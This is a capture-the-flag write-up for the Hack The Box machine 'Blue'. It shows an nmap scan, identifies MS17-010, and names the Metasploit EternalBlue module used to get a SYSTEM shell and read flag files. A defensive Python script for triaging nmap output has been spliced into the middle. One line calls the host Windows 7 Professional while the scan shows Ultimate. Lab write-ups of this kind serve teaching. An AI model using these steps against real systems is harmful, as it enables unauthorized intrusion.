Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks sin
┌──(kali㉿kali)-[~]
└─$ nmap -p- -A -T4 192.168.154.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 03:39 EDT
Nmap scan report for 192.168.154.129
Host is up (0.00012s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: WIN-845Q99OO4PP
| NetBIOS computer name: WIN-845Q99OO4PP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-03-11T03:42:02-04:00
| smb2-time:
| date: 2024-03-11T07:42:02
|_ start_date: 2024-03-11T17:58:29
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: WIN-845Q99OO4PP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ea:70:5f (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.80 seconds
The SMB output says this is Windows 7 Professional.
There are a couple of shares with null session read access (the trick of giving smbmap wrong creds works here):
nmap has vuln scripts that will check for known vulnerabilities in a service. It finds a big one, MS17-010.
Searching on Exploit DB led to the following script.
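As an added example that is not part of the original write-up, here is a small Python triage script that reads nmap's normal output (like the scan above) and reports the defensive findings a reviewer would pull from it: SMB reachable, an end-of-life OS that MS17-010 applies to, and SMB signing disabled or not required. The sample scan text, the rule table and the wording of each finding are my own constructions.

```python
import re

# Constructed sample, trimmed from the nmap output shown on this page.
NMAP_OUTPUT = """\
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| smb2-security-mode:
|_    Message signing enabled but not required
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
# (NSE script name, substring to look for in its output, finding to report)
RULES = [
    ("smb-os-discovery", "Windows 7", "Windows 7 reported: end-of-life OS, confirm MS17-010 is installed and SMBv1 is disabled"),
    ("smb-security-mode", "message_signing: disabled", "SMB1 message signing disabled: sessions can be tampered with or relayed"),
    ("smb2-security-mode", "not required", "SMB2 signing not required: enforce RequireSecuritySignature on the server"),
]

def parse_ports(text):  # -> {port: (state, service, version)} from the nmap port table
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports[int(m.group(1))] = (m.group(3), m.group(4), m.group(5) or "")
    return ports

def parse_scripts(text):  # -> {script_name: [output lines]} from the NSE host-script block
    scripts, current = {}, None
    for line in text.splitlines():
        body = line.strip()
        if not body.startswith("|"):
            continue
        body = body.lstrip("|_ ")
        if re.fullmatch(r"[a-z0-9-]+:", body):  # script header such as 'smb-os-discovery:'
            current = body[:-1]
            scripts[current] = []
        elif current:
            scripts[current].append(body)
    return scripts

def triage(text):  # apply RULES to one scan report and return the list of findings
    ports, scripts = parse_ports(text), parse_scripts(text)
    findings = ["SMB (445/tcp) reachable from the scanning host"] if ports.get(445, ("",))[0] == "open" else []
    for script, needle, finding in RULES:
        if any(needle in l for l in scripts.get(script, [])):
            findings.append(finding)
    return findings
```

Run `triage(NMAP_OUTPUT)` on the sample, or on the text of any `nmap -A` report, to get the findings as a list of strings.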
We can use Metasploit to execute this.
Entry 3 is a scanner; we can run that to confirm the vulnerability. Entry 4 needs a backdoor that is already on the system, so we can't use it. Let's start with the scan first and then use entry 0.
We can run it after entering RHOST.
We can see that it is indeed vulnerable. We can exploit it.
Initial Access
Coming back to entry 0, i.e. exploit/windows/smb/ms17_010_eternalblue. We shall use it now after setting up the options and payload.
We now have a meterpreter shell.
As you can see, we are already NT AUTHORITY\SYSTEM, which is the Windows equivalent of root access.
Now we can just grab the flags we need.
C:\Windows\system32>cd \users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 17,256,050,688 bytes free
C:\Users>type administrator\desktop\root.txt
[REDACTED]
C:\Users>type haris\desktop\user.txt
[REDACTED]